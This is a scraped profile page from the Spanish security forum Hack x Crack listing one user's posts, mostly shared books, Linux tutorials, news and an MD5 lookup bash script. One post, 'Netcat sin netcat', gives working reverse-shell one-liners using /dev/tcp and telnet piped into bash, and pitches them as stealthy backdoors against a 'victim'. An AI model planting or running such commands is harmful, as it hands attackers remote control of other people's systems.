• Inicio
  • Blog
  • Creandolared
  • Buscar
  • Ingresar
  • Registrarse

    • Hack x Crack - Comunidad de Seguridad informática »
    • Perfil de Neutron »
    • Mostrar Mensajes »
    • Temas
    ¿Quieres aprender de páginas web? Visita la comunidad Creandolared
    • Información del Perfil
      • Resumen
      • Mostrar Estadísticas
      • Mostrar Mensajes...
        • Mensajes
        • Temas
        • Adjuntos

    Mostrar Mensajes

    Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

    • Mensajes
    • Temas
    • Adjuntos

    Temas - Neutron

    Páginas: [1] 2 3
    1
    Retroalimentación / Falta de respecto al foro de hackxcrack en su canal irc de ircnode
    « en: Julio 20, 2013, 07:34:32 pm »
    Buenas, tengo mucho sin postear en el foro, como algunos saben no suelo andar por el foro hoy dia pero ando activamente en el irc. Desde hace ya mucho tiempo, desde la era de Alan++ como admin o antes se han dado algunos choques en el canal de #hackxcrack en donde el staff del servidor irrespecta al staff del foro.

    Esto lo hacen cuando un staff del servidor se auto-atribuye poderes y privilegios en el canal que no le han sido autorizado por el staff del foro que maneja el canal (del cual soy parte), esto ha pasado ya varias veces, el mismo Alan ya lo habia discutido con ellos, no obstante el problema se da cada cierto tiempo, ya habiamos pensado cambiarnos de servidor una vez, pero seguimos ahi.

    En el dia de hoy ha pasado lo siguiente, un sujeto no se quien es ni me interesa mucho de nick M4F1 un supuesto anonymous, ha aparecido en el canal con grandes privilegios, como un owner (creo), el marcos me comento al respecto, le pregunte a Dj_Dexter y a k133 el por que este user que no pertenece al foro tiene esos privilegios en nuestro canal (es una falta de respecto al foro), pues el k133 estaba ocupado, pero el Dexter respondio ahi medio desatinado, basicamente justificando, el sujeto M4F1 termino baneandome por mis interrogaciones al Dexter que es parte del staff y quien le otorgo ese privilegio a alguien que ni conocemos.

    Evidentemente esto es una falta del respecto al foro y al staff del mismo, el staff del servidor tiene por regla respetar el staff de cada canal, por lo tanto ellos no pueden andar dando poderes y quitandolo a su antojo en el canal del foro. Asi que documento eso aqui porque ya no es la primera vez que pasa, el staff puede comprobar esto en su foro.

    De nuevo se pone el tema sobre la mesa, Debemos cambiarnos a un servidor donde se respete al foro? Seguiremos permitiendo este tipo de cosas? Considerariamos irc.freenode.net? Donde cabe decir ademas que hay cientos de canales open source y demas en esa red.

    En freenode podriamos tener este hwebchat

    Queda a su disposicion.

    Saludos!

    2
    Electrónica / [Book] 30 Proyectos Arduino para genios malvados :-)
    « en: Noviembre 14, 2012, 03:28:48 am »
    Hola, pues para inaugurar la seccion les traigo un libro que tengo por ahi y aun no he leido (need money for buy materials :/), pero que leere dentro de poco. Espero que lo disfruten y les sea de utilidad.



    DESCARGAR y/o VISUALIZAR

    Titulo original: 30 Arduino projects for the evil genius | Pags.: 208 | Fromato: PDF | Autor: Simon Monk | Idioma: Ingles | Peso: 8.2 MB

    Que lo disfruten amigos.

    Un saludo!

    3
    Hacking Wireless / Alguno de ustedes tiene una Alfa Network AWUS036H?
    « en: Octubre 13, 2012, 07:07:26 pm »
    Hi, eso me gustaria saber si alguno de ustedes tiene el adaptador especificado en el titulo y si lo usa bajo Linux con el controlador Realtek RTL 8187 (no con el 8187L). En ese caso, quisiera saber como les funciona, en cuanto a wireless cracking claro, teniendo en cuenta la asociacion, inyeccion, alcanze y eso. El driver rtl8187L funciona nitido hasta donde se, pero el rtl8187 al menos a mi, no me va muy bien.

    Gr33tz!

    4
    Hacking / [Hack-Tip] Netcat sin netcat =)
    « en: Septiembre 30, 2012, 07:56:06 am »
    Hola, pues eso, mostrare un ligero truco que aprendi no hace mucho en un video que tambien les dejare, es una forma de conectarse desde un Sistema Linux a otro ordenador que ya tengas en escucha en algun puerto en especifico, tal cual como obtienes una reverse shell con netcat, solo que asi hariamos que la PC de la victima se conectara hacia nosotros sin usar el netcat propiamente. Esto tiene su ventaja y ya que es una simple linea de codigo bash se podria usar hasta en cualqueir programa sencillo o script para crear un backdoor, sin preocuparnos de si la victima tiene el netcat o no, claro ademas sabiendo de que si se usara el netcat en la PC victima para esto si este lo viera en los procesos del Sistema inmediatamente tumbaria la conexion, aunque claro de ambas formas con un netstat -an se puede detectar la conexion. Solo que si se hace un px aux si se esta usando el netcat el proceso sale con el nombre de netcat obviamente lo que mosquearia al usuario (vctima en este caso.

    El truco es como sigue:
    Código: [Seleccionar]
    Hacker: nc -l -n -vv -p 8080
     Victima: /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1

    Asi de simple, en tu PC pones a la escuchas el netcat y el PC victima se conecta a ti, suponiendo que tu IP es 173.214.173.151, clao el puerto se puede cambiar.

    Otro metodo es el siguiente, aunque este no lo he probado:
    Código: [Seleccionar]
    Hacker: nc -l -n -vv -p 8080
     Hacker: nc -l -n -vv -p 8888
     Victim: telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888

    Claro, estamos suponiendo que tu IP es 173.214.173.151. Como pueden ver, es muy simple, muy util y se podria usar para muchas cosas o mas bien en muchas cosas, el resto depende de ustedes, pero recuerden: Do not be Evil!

    Aqui les dejo el video donde aprendi eso hace un tiempo y recomiendo que se subscriban, es un buen show (de hacking claro) y a veces muestran cosas muy interesantes.

    Saludos!

    5
    GNU / Linux / Como ganar dinero con Software Libre
    « en: Septiembre 16, 2012, 09:17:42 pm »
    Hi, bueno aqui les dejo una pequeña orientacón sobre como ganar dinero con software libre, se trata de un post sobre una presentacion de la Campus Pàrty del 2010 por alguien llamado Patrick Aljord. Si bien podria considerar que faltaron algunas cosas importantes y que en otras podria no estar del todo de acuerdo con lo dice, es una buena orientacion y les da idea de que puedan hacer y que deben aprender para hacer money.

    Empezando aqui....

    Desde hace años, el software libre para muchos estudiantes de ingeniería sistemas es una manera de aprender y comunicar, una pasión y una diversión. Una diversión que requiere mucho tiempo. Pasada la graduación, frente a la necesidad de ganarse la vida, muchos abandonan al desarrollo del software libre para ir a trabajar al “lado oscuro” del software privado de origen extranjero.

    En la Campus Party Colombia 2010 Patrick Aljord nos mostró como se puede ganar la vida sin dejar a lado sus ideales de libertad y su pasión para el software libre. Se mostrará como se puede ganar dinero a través del uso y desarrollo de software libre, más precisamente el desarrollo de aplicaciones web. Veremos como se puede cumplir usando herramientas libres, simples, poderosas y económicamente accesibles para todos. Se explicará como se puede lograr siendo empleado y también siendo emprendedor en un mundo en el cual la web se hace más y más insustituible y necesaria.

    Les dejo el vídeo de la presentación:

    Ver la presentacion aqui!!!

    Fuente:DragonJAR

    Espero les sea util a mas de uno.

    Saludos!

    6
    GNU / Linux / Descargar distros GNU/Linux versiones recientes y antiguas =)
    « en: Julio 20, 2012, 07:22:41 pm »
    Buenas, debido a los multiples posts que se han estado sucediendo en este foro solicitando links para descargar versiones anteriores de algunas distros GNU/Linux, he decidido abrir este post y fijarlo para que de ese modo nos facilitemos y nos ahorremos algunas posibles proximas solicitades sobre el asunto.

    Bueno, pueden descargar imagenes viejas y recientes de una gran parte de distros GNU/Linux en:
    • Descargar imagenes de distros GNU/Linux, versiones viejas y recientes.
    • Distros GNU/Linux 100% libres.
    • Website en español para descargar isos de algunas distro.
    • Parecida a la anterior pero en ingles y muy completa, hay versiones antiguas y recientes.
    • Otro alternativa con un catalogo no tan amplio, solo distros archiconocidas.
    • Distrowatch una muy buena pagina, con muchisimas distros para descargar, ademas da una pequeña reseña de cada una, tambien hay distros de la familia BSD.
    Pueden a ver muchas mas alternativas de descargas ahi afuera, ftps y demas, pero creo que con estas les basta =)


    Un saludo family!

    7
    GNU / Linux / [Tutorial] Instalación de Debian Squeeze con particiones cifradas :-)
    « en: Junio 27, 2012, 07:52:33 pm »
    En este tutorial se muestra paso por paso como instalar Debian Squeeze con particiones cifradas. Todos los creditos del mismo pertenecen al autor del blog del cual ha sido tomado el tutorial, Lisandro Damián Nicanor Pérez Meyer, y el enlace al tutorial original es este Instalando Debian Squeeze con particiones encriptadas.

    <<<START>>>
    Voy a cubrir algunos pasos esenciales y luego saltar directamente hacia la parte del particionado de discos. También vale aclarar que voy a usar el instalador en modo texto sencillamente porque lo encuentro mas cómodo, pero su análogo gráfico es igual de sencillo.

     El primer paso es bootear el instalador de Debian Squeeze:



    Para hacer las cosas mas interesantes, voy a elegir la opción "expert install".



    Y como éste post es en español... usemos español para la instalación.





    A partir de ahí, hago un gran salto hasta elegir que componentes del instalador deben descargarse. Y debo ser sincero: éste paso estimo que debe hacerse ya que vamos a particionar manualmente, pero la verdad no sé si es necesario. El componente a cargar es cfdisk-udeb.





     Seguimos adelante hasta llegar al particionado de discos.



    La primera opción que se nos ofrece es hacer un particionado guiado utilizando todo el disco. Noten que también está la posibilidad de hacer un LVM cifrado en forma guiada.



     Pero nosotros vamos a hacer las cosas de forma manual :-)



    Para éste ejemplo, utilicé una máquina virtual con VirtualBox. Como la máquina tiene el disco vacío, es necesario hacer algunos pasos previos. Si el disco sobre el que van a instalar Debian Squeeze ya tenía algún sistema operativo, éstos pasos seguramente no les va a tocar hacerlos. La idea aquí es elegir en qué disco (y no en que partición) vamos a instalar nuestro SO.



    Como les decía, el disco estaba vacío, por lo que es necesario crear una tabla de particiones. Noten que en la imagen está seleccionado "No", pero obviamente van a necesitar elegir "Sí" :-)





    Bien, ya tenemos nuestro disco con tabla de particiones listo para ser usado. Nuestro pŕoximo paso va a ser crear una partición /boot no encriptada, para poder permitir que el sistema bootee. Seleccionamos el espacio libre de nuestro disco.



     Creamos una nueva partición de 100 MB.





     La hacemos una partición primaria (aunque es muy posible que funcione sobre una lógica).



     Al principio del espacio libre, sólo por gusto.



    Por defecto el instalador queire establecer una partición /, por lo que es necesario cambiarle el punto de montaje.





     Finalmente, guardamos los cambios.



     Hora de configurar los volúmenes cifrados.



     Para proceder, es necesario guardar los cambios a los discos.



     Y creamos un volumen cifrado.



     Elegimos el espacio libre de nuestro disco para crear tal volumen.



     Guardamos los cambios.





     Y terminamos la creación del volumen cifrado.



    Al crear un volumen cifrado, el sistema ofrece sobreescribir los datos actuales con datos aleatoreos. Éste paso no es estrictamente necesario, pero si altamente recomendable.



    La sobreescritura de los datos con datos aleatoreos puede tardar mucho tiempo. Tardé mas de tres horas en éste paso en un disco de 160G. Se puede cancelar en cualquier momento sin problemas aparentes.



     Un paso mas que importante: establecer la frase-contraseña para cifrar el disco.



    Por supuesto, hay que repetir la misma para validar que se haya escrito correctamente. ¡Y a no olvidársela!



     Ahora nos toca configurar el gestor de volúmenes lógicos (LVM).



     Otra vez, hay que guardar los cambios.



    La idea ahora es crear un grupo de volúmenes y crear dentro de él los volúmenes lógicos que querramos (swap y / en nuestro caso).



     Un nombre para el grupo de volúmenes.



     Creamos el grupo de volúmenes en nuestra partición encriptada.



     Una vez creado el grupo de volúmenes, hay que crear los volúmenes lógicos para la swap y /.











    Hay que repetir éstos últimos pasos para crear /. Luego seleccionamos nuestro volúmen lógico para la swap y establecemos una partición de éste tipo en él:









     Otra vez, hay que repetir los pasos anteriores para /, normalmente queda como la siguiente figura.




     ¡Terminamos el particionado! Hora de guardar los cambios.





    El resto sigue siendo el mismo proceso de instalación de siempre. Una vez que se reinicia el sistema, podemos ver como se nos pide la frase-contraseña que establecimos antes para poder bootear.



    Y eso es todo :-)
    <<<END>>>

    Eso es todo, como ven es un tutorial muy descriptivo, si tienen preguntas la pueden hacer ;D Para hacer lo mismo con Ubuntu el asunto no cambia mucho, si desean un tuto similar con Ubuntu me lo hacen saber y lo preparo.

    Un saludo!

    8
    Retroalimentación / Algo sobre el nuevo tema; los mensajes recientes ¿? :-/
    « en: Abril 26, 2012, 02:45:25 am »
    Hello brothas, tenia unos dias que no me logueaba, ahora me entero del nuevo tema o mas bien de la ligera modificacion que se le ha hecho y me parece bien, pero hay algo que en lo personal no me gusta, no me agrada lo que han hecho con los mensajes recientes del foro, me parece que es mas practico y mas facil para todos si dejan los mensajes recientes como estaban, es decir, lo muestran ahi en el mismo lugar, lo cual suele ser la forma mas tradicional en los foros de mostrarlos. Si, ya se que en la pagina de inicio puedo ver los mensajes  o respuestas (como le llames) recientes, pero no es igual, ya se tambien que si le doy click a ver mensajes recientes del foro tambien los puedo ver, pero repito no es igual, es mucho mas comodo tenerlos ahi y poder checarlos sin tener que dar click en ningun lado y sin tener que ir a la pagina de inicio, es solo una sugerencia, no se si alguien mas le parece razonable lo que digo  :-\

    Un saludo.

    9
    GNU / Linux / Zorin OS: La puerta a Linux para usuarios Windows.
    « en: Febrero 27, 2012, 06:42:01 pm »
    Wenas, me encontre con este post en tuxapuntes que daba una ligera reseña de esta distro, y me ha parecido un tanto interesante. Esta distro tal como dicen sus creadores, esta pensada para usuarios de windows que deseen introducirse en Linux o podria decirse  para usuarios de windows que deseen usar Linux por "arribita". En todo caso, yo digo que por ejemplo para un Cyber Cafe esta distro seria una muy buena alternativa. Ya que le resultaria familiar a los usuarios de windows y nosotros nos evitariamos las licencias y todos esos p%^#s malware de windows. La distro esta basada en Ubuntu pero con una interfaz grafica muy similar a Windows, inclusive tiene un manejador de temas que nos permite elegir un tema de escritorio como el de Windows 7, Vista, XP , 2000, Mac OS X o Linux (GNOME). Vayen viendo la ventaja por ese lado.

    Requisitos minimos para correr Zorin-OS
    • Procesador de 700 mhz
    • 376 MB de RAM
    • 3 GB de Disco Duro
    Zorin OS es un sistema operativo multi-funcional diseñado para usuarios Windows que quieran tener un sencillo y suave acceso a Linux y como dije antes esta basado en Ubuntu.


    Zorin OS posee como caracteristicas un programa propio para cambiar de temas, el cual ha sido creado exclusivamente para Zorin OS. Este permite cambiar la interfaz del usuario con un toque de un boton. Entre otros softwares propios de Zorin OS podemos mencionar el Splash Screen Manager y el Internet Browser Manager.

    Windows 7 vs. Linux 2011: the Desktop Comparison

    Zorin OS ofrece a los usuarios una mayor flexibilidad. Permite el uso de Zorin OS junto con su sistema operativo actual, asi como la ejecucion de programas de Microsoft Windows con la ayuda de los emuladores WINE y PlayOnLinux.

    En cuanto a seguridad, cabe decir que gracias a la inmunidad de Zorin OS a los virus de Windows, nunca tendra que preocuparse por tales bichos (malwares). Y cuando una amenaza potencial hacia el Zorin OS es encontrada las actualizaciones de software llegan usualmente en cuestiones de horas (y gratis claro). Con Zorin OS puede tener paz al respecto de su seguridad ;D


    Como dije anteriormente, esta distro es una buena opcion para Cyber Cafes, asi como para usuarios Windows que deseen usar Linux por "arribita", asi por ejemplo puedes instalar este en una PC familiar que compartas con tus hermanitos en casa, bueno la inmaginacion en cuanto a que uso quieras darle corre por tu cuenta.

    Cabe decir que tambien hay una version Premiun de este OS que cuenta con soporte por parte de la empresa que desarrolla esto, claro pagando. Ademas existen algunas versiones especializadas del mismo, estas son; Ultimate, Business, Multimedia y Gaming, por los nombres ya se deben dar cuenta de en que estan especializadas.

    Espero que les haya gustado el post, tienen mas informacion y screenshots en la pagina oficial del proyecto Zorin-OS, obviamente tambien pueden descargar el Zorin-OS desde el link anterior.

    Un saludo!

    10
    Off-Topic / Un ordenador totalmente Open Source :-)
    « en: Enero 12, 2012, 02:55:51 am »
    Hi family, pues leyendo este interesante articulo me he enterado de que Richard Stallman solo usa una unica PC, pero el asunto no es ese, sino que esa PC es una que tan solo usa Open Source desde el firmware, driver, BIOS todo en lo absoluto hasta donde se, me parecio interesante asi que lo coparto con ustedes, aqui el link Lemote Yeelong netbook. Interesante no? ;D

    P.D: La razon por la cual el tio Stallman usa esta PC es para tener mas control en total de la misma (obvio), debido a su temor de que sea violada su privacidad  y todos esos asuntos, por tal razon no usa telefonos celulares xD

    Saludos!!!!!!!!!!!!

    11
    Manuales y revistas / [MANUAL] Pentest: Recolección de Información (Information Gathering)
    « en: Diciembre 31, 2011, 04:39:34 pm »
    Este manual sobre Information Gathering ha sido realizado por el Instituto Nacional de Tecnologias de la Comunicación (INTECO), bueno sin mas preámbulo, el contenido.

    Citar
    ÍNDICE
       1.  INTRODUCCIÓN                                                                               
      5
       2.  ÁMBITO Y RESPONSABILIDADES                                                  
      8
       3.  IMPORTANCIA DEL FINGERPRINTING                                            
      9
           3.1.  Exploits / Antivirus                                                                     
      9
           3.2.  Caso 1: Spear Phishing Attack                                                   
    15
           3.3.  Caso 2: Social Engineering Toolkit                                             
      20
           3.4.  Caso 3: Web Server Exploitation                                                 
      22
       4.  EXTERNAL FOOTPRINTING                                                          
       27
           4.1.  Active Footprinting                                                                   
       27
                 4.1.1.     Dns Discovery                                                               
    27
                    4.1.1.1.   DIG                                                                           
      28
                    4.1.1.2.   DNS Cache Snooping                                                 
    31
                    4.1.1.3.   DNS Bruting: Metasploit                                             
    34
                    4.1.1.4.   Nmap List Scan (-sL)                                                 
      36
                 4.1.2.     Banner Grabbing                                                           
      36
                 4.1.3.     Maltego                                                                         
    38
                 4.1.4.     Fingerprinting Web                                                     
        48
                    4.1.4.1.   Identificación del servidor web                                     
    49
                    4.1.4.2.   Identificación del CMS                                               
    50
                    4.1.4.3.   Identificación de vulnerabilidades y plugins de los CMS
      52
                    4.1.4.4.   Nikto (Scan Tunning / Plugins)                                     
    54
                 4.1.5.     SMTP                                                                          
    57
                    4.1.5.1.   Bounce Back                                                           
       57
                    4.1.5.2.   SMTP User Enumeration                                             
    58
                 4.1.6.     Tecnología VoIP                                                           
      60
           4.2.  Pasive Footprinting                                                                   
    63
                 4.2.1.     Protocolo Whois                                                         
        63
                 4.2.2.     Google Hacking                                                             
    67
                 4.2.3.     Servicios Pastebin, Pastie y Github                                 
    76
                 4.2.4.     SNMP Discovery con Shodan                                       
    78
             4.2.5.     Reconocimiento Activo                                                       
    79
                4.2.5.1.   Manual Browsing: Burp Suite                                         
      79
       4.3.  Scanning en entornos Stateful                                                   
         81
             4.3.1.     Ocultando la identidad                                                     
       86
                4.3.1.1.   Escaneando equipos por medio de TOR                         
    86
                4.3.1.2.   Idle-Scanning con Nmap                                               
    89
             4.3.2.     UDP Scanning/ Versión Detection                                     
      96
             4.3.3.     Detección de Web Application Firewall                               
    97
             4.3.4.     Identificando reglas en el Firewall                                     
      98
    5. INTERNAL FOOTPRINTING                                                              
    104
       5.1.  Meterpreter                                                                                 
    105
             5.1.1.     Pivoting con Meterpreter + Nmap                                     
    109
             5.1.2.     Portfwd                                                                           
    112
             5.1.3.     Scripts                                                                         
      114
             5.1.4.     Armitage                                                                         
    117
       5.2.  SNMP                                                                                       
    119
             5.2.1.     Onesixtyone / snmp_brute.nse / snmpenum.pl /snmpwalk 
    120
       5.3.  Netbios/SMB Attacks                                                                 
    125
             5.3.1.     Nbstat.nse                                                                   
      126
             5.3.2.     Smb-enum-users.nse                                                   
      127
       5.4.  Fingerprinting Pasivo                                                                 
    129
             5.4.1.     Satori                                                                         
       129
             5.4.2.     Yersinia                                                                       
    132
             5.4.3.     SinFP                                                                           
    132
             5.4.4.     NetworkMiner                                                                 
    135
    6. CONCLUSIONES                                                                             
    137


    Autores: Borja Merino Febrero y José Miguel Holguín | Pags.: 137 | Formato: PDF | Size: 5.8 MB | Descarga: Directa | Licencia: No especificada

    DESCARGAR O VISUALIZAR

    Enjoy it!

    Saludos!

    12
    Manuales y revistas / [MANUAL] Taller Auditoria y Pentest 2011
    « en: Diciembre 31, 2011, 04:15:55 pm »
    Presentación

      Todos sabemos la cantidad de campos que abarcan las nuevas tecnologías y lo rápido que avanzan, su función es la de facilitarnos el trabajo diario, optimizando procesos y ayudándonos a obtener un control sobre el medio lo mas cercano posible a la total comprensión de lo que ocurre a nuestro alrededor y así poder tener una respuesta rápida a eventos que de no solventarlos pueden incurrir negativamente en el desarrollo de nuestro trabajo diario.

      Tenemos que ser conscientes que en los tiempos que corren de crisis económica los presupuestos dedicados al departamento tecnológico no son excesivamente elevados, por lo que las partidas suelen destinarse a cubrir el núcleo de negocio dejando a un lado aplicaciones de control de seguridad de la información.

      Desde mi punto de vista el uso de software libre en procesos de monitorización y control puede ser un buen método de paliar estos déficits.

      Hoy en día la seguridad de la información está en boca de todos, amparados por una ley como la lopd y su real decreto rlopd, somos conscientes que hay que securizar nuestro entorno para proteger nuestro valor de negocio que es la información.

      Para ello ya no es suficiente, tener un firewall instalado, o un antivirus actualizado, hace falta algo más, no pretendo que uno se ponga a securizar de repente invirtiendo grandes cantidades de dinero, lo que pretendo es que tomemos consciencia de lo que tenemos que securizar primero, que parte de nuestra información es vital y como debemos protegerla.

      En este proceso de concienciación debemos tener claro en que punto nos encontramos, para ello el objetivo de este taller es obtener todo tipo de información para hacernos nuestro mapa de red y poder comprobar que puntos son vulnerables de ser atacados y en que medida pueden afectar a nuestra información.

      Este mapa de red nos ayudará a tener un visión clara de nuestro sistema, a partir de aquí depende de la voluntad y tesón personal.

    Contenido

    Este manual ya tiene casi un año de creado, pero aun sigue siendo muy bueno y útil.

    Autor::  Bernabé Muñoz | Pags.:107 | Formato: PDF | Size: 6.4 MB | Licencia: No especificada. | Descarga: Directa

    DESCARGAR O VISUALIZAR

    Enjoy it!

    Saludos!


    13
    Batch / Bash / [BASH] Hash Finder MD5 by Neutron
    « en: Diciembre 04, 2011, 10:40:10 pm »
    Hola amigos, he estado viendo unos videos muy buenos por ahi en YouTube, con los cuales he aprendido algunos truquillos para poder usar algunos servicios web desde la terminal con wget y otras utilerias/comandos/programas, etc., de linux, en este script aplico algo de eso para usar un servicio web para desencriptar y encriptar en MD5, el script lo acabo de hacer, ademas de que no soy tan bueno en eso, por lo que supongo que se podra mejorar, asi que cualquiera puede modificarlo a su gusto, inclusive se puede hacer en otros lenguajes de scripting, tambien agradezco consejos, criticas constructivas, etc.

    Código: [Seleccionar]
    #!/bin/bash
    # 4 de Diciembre de 2011
    echo "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
    echo "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
    echo "&&&&&&&                                     &&&&&&&"
    echo "&&&&&&&          Hash Finder MD5            &&&&&&&"
    echo "&&&&&&&                 by                  &&&&&&&"
    echo "&&&&&&&              Neutron                &&&&&&&"
    echo "&&&&&&&                                     &&&&&&&"
    echo "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
    echo "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&"
    echo "___/\__________/\_______/\_____________/\_________/"
    function Code(){
    clear
    echo "Introdusca la palabra a ser encriptada en MD5: "
    read x
    echo "................................................."
    echo "La cadena introducida encriptada en MD5 es: "
    wget -q --post-data "plain=$x" "http://md5hashcracker.appspot.com/generate" -O -;echo ""
    echo "................................................."
    Inicio
    }
    function Decode(){
    clear
    echo "Introdusca el hash MD5 a desencriptar: "
    read x
    echo "................................................."
    echo "El hash desencriptado es: "
    wget -q --post-data "query=$x&submit=Crack" "http://md5hashcracker.appspot.com/crack" -O -|grep -A 1 "cracked</td>" | tail -n1|cut -d\> -f2 |cut -d\< -f1
    echo "................................................."
    Inicio
    }
    function Salir(){
    echo "Gracias por usar este script :D"
    echo ".............................."
    exit
    }
    function Inicio(){
    echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
    echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
    echo "@@@@@@@                                     @@@@@@@"
    echo "@@@@@@@                <Menu>               @@@@@@@"
    echo "@@@@@@@                1. Encriptar         @@@@@@@"
    echo "@@@@@@@                2. Desencriptar      @@@@@@@"
    echo "@@@@@@@                3. Salir             @@@@@@@"
    echo "@@@@@@@                                     @@@@@@@"
    echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
    echo "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
    echo -n "Introdusca 1,2 o 3, segun lo que desee hacer: "
    read opt
    case $opt in
     1)
     Code;;
     2)
    Decode;;
     3)
     Salir;;
    esac
    }
    Inicio
     

    P.D: Como pueden notar el script no valida que se introduscan los datos solicitados o que se hagan de forma correcta (no en esta version xD) asi que deben tratar de hacer esos pasos correctamente.

    P.D2: Criticas, sugerencias, comentarios,etc., son bienvenidos.

    Saludos!!!

    14
    Batch / Bash / [LIBRO] Programación avanzada en shell
    « en: Noviembre 16, 2011, 04:55:23 pm »
    El intérprete de mandatos o "shell" es la interfaz principal entre el usuario y el sistema,
    permitiéndole a aquél interactuar con los recursos de éste. El usuario introduce sus órdenes, el
    intérprete las procesa y genera la salida correspondiente.

    Por lo tanto, un intérprete de mandatos de Unix es tanto una interfaz de ejecución de órdenes
    y utilidades, como un lenguaje de programación, que admite crear nuevas órdenes –
    denominadas guiones o “shellscripts”–, utilizando combinaciones de mandatos y estructuras
    lógicas de control, que cuentan con características similares a las del sistema y que permiten
    que los usuarios y grupos de la máquina cuenten con un entorno personalizado [2].

    En Unix existen 2 familias principales de intérpretes de mandatos: los basados en el intérprete
    de Bourne (BSH, KSH o BASH) y los basados en el intérprete C (CSH o TCSH).

    Este curso de formación pretende ser un guía para el usuario de Linux, que le permitirá
    comprender, ejecutar y empezar a programar en la Shell, haciendo referencia especialmente a
    BASH (Bourne Again Shell) –evolución de BSH, con características de KSH y CSH–, ya que
    es el intérprete de mandatos más utilizado en Linux e incluye un completo lenguaje para
    programación estructurada y gran variedad de funciones internas.


    Código: [Seleccionar]
    [b]Indice[/b]
    1. Introducción. ...4
       1.1. Características principales de BASH............................................................................4
       1.2. Cuándo utilizar el intérprete de mandatos.....................................................................5
    2. Modos de operación...6
       2.1. La línea de mandatos. ..................................................................................................6
       2.2. Edición y ejecución de un guión. .................................................................................6
       2.3. Recomendaciones de programación. ............................................................................7
    3. Redirecciones. ...9
       3.1. Redirección de entrada.................................................................................................9
       3.2. Redirecciones de salida................................................................................................9
       3.3. Combinación de redirecciones. ..................................................................................10
       3.4. Redirección de entrada/salida.....................................................................................11
       3.5. Documento interno. ...................................................................................................11
       3.6. Tuberías...12
    4. Variables. ...14
       4.1. Tipos de variables. ...14
          4.1.1. Variables locales. ................................................................................................14
          4.1.2. Variables de entorno. ..........................................................................................15
          4.1.3. Parámetros de posición. ......................................................................................16
          4.1.4. Variables especiales. ...........................................................................................17
       4.2. Matrices...18
       4.3. Configuración del entorno. ........................................................................................18
    5. Expresiones. ...20
       5.1. Expresiones aritméticas. ............................................................................................20
       5.2. Expresiones condicionales. ........................................................................................22
          5.2.1. Expresiones de ficheros.......................................................................................23
          5.3.2. Expresiones comparativas numéricas. .................................................................24
          5.3.3. Expresiones comparativas de cadenas. ................................................................25
    6. Entrecomillado y expansión. ..........................................................................................26
       6.1. Entrecomillado. ...26
       6.2..Expansión...26
          6.2.1. Expansión de llaves.............................................................................................27
          2.6.2. Expansión de tilde...............................................................................................27
          6.2.3. Expansión de parámetro o de variable. ................................................................28
          6.2.4. Sustitución de mandato. ......................................................................................29
          6.2.5. Expansión aritmética...........................................................................................30
          6.2.6. Sustitución de proceso.........................................................................................30
          6.2.7. División en palabras............................................................................................31
          6.2.8. Expansión de fichero...........................................................................................31
    7. Programación estructurada. ..........................................................................................33
       7.1. Listas de mandatos...33
          7.1.1. Listas condicionales. ...........................................................................................33
       7.2. Estructuras condicionales y selectivas. .......................................................................34
                                                                     2
          7.2.1. Estructuras condicionales. ...................................................................................34
          7.2.2. Estructura selectiva. ............................................................................................36
       7.3. Bucles...37
          7.3.1. Bucles genéricos. ................................................................................................37
          7.3.2. Bucles condicionales “mientras” y “hasta”. .........................................................38
          7.3.3. Bucle de selección interactiva. ............................................................................39
    8. Funciones. ...40
    9. Características especiales ...............................................................................................42
       9.1. Programas interactivos...............................................................................................42
       9.2. Control de trabajos...43
       9.3. Intérprete de uso restringido.......................................................................................44
    10. Referencias...46

    Titulo: Programación avanzada en shell | Pags.: 46 | Autor: Ramón M. Gómez Labrador | Descarga: Multiupload | Peso: 149.06 KB | Formato: PDF | Licencia: No espeficicada.

    DESCARGAR

    GreetZ!!!

    15
    Java y Android / El código fuente de Android 4.0 disponible :-)
    « en: Noviembre 16, 2011, 01:17:19 pm »
    Tal y como señalan nuestros compañeros de MuyComputer, Google ha publicado el código fuente de la última versión su plataforma móvil. Android 4.0 Ice Cream Sandwich (ICS) ya está disponible pues en toda su extensión, tal y como prometió Google cuando lanzó este desarrollo, del que ya avisamos que pronto estaría disponible.

    Jean-Baptiste Queru, ingeniero software de Google en la división Android Open Source Project, ha anunciado en un foro de debate de Android que el código fuente se estaba publicando en los repositorios oficiales, y que de hecho lo que se ha publicado allí es el código fuente de Android 4.0.1, que será la que utilice el primer smartphone que estará basado en este sistema operativo, el Galaxy Nexus.

    Además en los repositorios se podrán encontrar los fuentes de Android 3.x Honeycomb, pero de forma algo desperdigada, ya que como explicaba Queru, “como Honeycomb estaba algo imcompleta, queríamos que todo el mundo se centrase en Ice Cream Sandwich“.

    Android 4.0 se ha rediseñado para reunificar el soporte para tablets y smartphones basados en Android con una versión que pueda utilizarse indistintamente en ambos tipos de producto.

    El código fuente de ICS compilar perfectamente para el Galaxy Nexus, pero se espera que otros dispositivos pronto sean añadidos a los repositorios, y los desarrolladores independientes ya pueden comenzar a crear ROMs personalizadas en diversos dispositivos.

    Fuente

    Páginas: [1] 2 3
    • SMF | SMF © 2013, Simple Machines
    • XHTML
    • RSS
    • WAP2
    Va un mudo y le dice a un sordo: Hack x Crack usa cookies. Pues eso... Learn more